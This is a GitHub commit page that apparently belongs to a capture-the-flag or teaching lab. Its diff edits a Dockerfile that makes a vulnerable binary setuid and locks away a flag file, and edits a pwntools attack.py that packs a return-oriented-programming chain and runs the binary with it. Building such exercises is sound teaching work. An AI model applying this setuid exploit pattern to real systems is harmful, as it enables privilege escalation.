Skip to content

Commit

Permalink
clean up for public consumption
Browse files Browse the repository at this point in the history
  • Loading branch information
@zsarge
zsarge committed Nov 14, 2024
1 parent 1f804e9 commit d5515e0
Show file tree
Hide file tree
Showing 2 changed files with 6 additions and 4 deletions.
5 changes: 2 additions & 3 deletions Dockerfile
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@ RUN apt update && \
vim \
gdb \
build-essential \
nano \
&& apt-get clean all

WORKDIR /app
Expand All @@ -17,17 +18,15 @@ RUN pip3 install -r requirements.txt
COPY Makefile example.c attack.py create_table.py flag.txt .
RUN make
RUN useradd -ms /bin/bash user
RUN useradd -ms /bin/bash john
RUN chmod 400 flag.txt && \
chmod o+r /tmp && \
chown user attack.py && \
chgrp user attack.py && \
ulimit -c unlimited && \
# chown 4755 create_table.py && \
cp example example-crash && \
chmod 4755 example

USER user

CMD ["/bin/sh"]
CMD ["/bin/bash"]

5 changes: 4 additions & 1 deletion attack.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -21,13 +21,16 @@

########################################

# pack ropchain at offset
payload = flat({
offset: rop.chain()
})

print("ropchain:")
print(rop.dump())

# start the process
with elf.process([payload]) as p:
p.interactive()
# print the output
print(p.recvrepeat(5).decode('utf-8').strip())

0 comments on commit d5515e0

Please sign in to comment.